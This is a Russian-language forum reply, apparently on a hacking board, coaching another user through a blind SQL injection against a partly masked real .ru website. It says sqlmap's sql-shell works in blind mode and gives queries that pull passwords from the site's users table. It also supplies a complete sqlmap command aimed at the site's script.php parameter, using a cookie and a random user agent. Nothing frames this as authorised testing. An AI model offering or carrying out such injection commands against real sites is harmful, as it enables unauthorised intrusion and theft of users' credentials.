Цитата:
В блайндах по ходу не реботает sql-shell.
|
Работает, и лучше всего! ;-)
Цитата:
[23:28:46] [INFO] retrieved: 0
|
Это лишь значит, что с таким id нету юзера в таблице. (у тебя же есть 2 вывода: 1343 и 1344)
Попробуй добиться хоть какого-нибудь вывода через скл-шелл, к примеру:
Цитата:
select password from loveumru_*e***l.users where id>10 (=1343,=1344)
select id from loveumru_*e***l.users where nick like '%a%'
|
И уточни тип уязвимости, ключом
--technique B и убери
-b (ну и --level=5 уже не нужен, коли дырка найдена), --dbms=MySQL (без кавычек)
Цитата:
python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --technique B --threads=5 --cookie="***" --random-agent --dbms=MySQL -p userid --sql-shell
|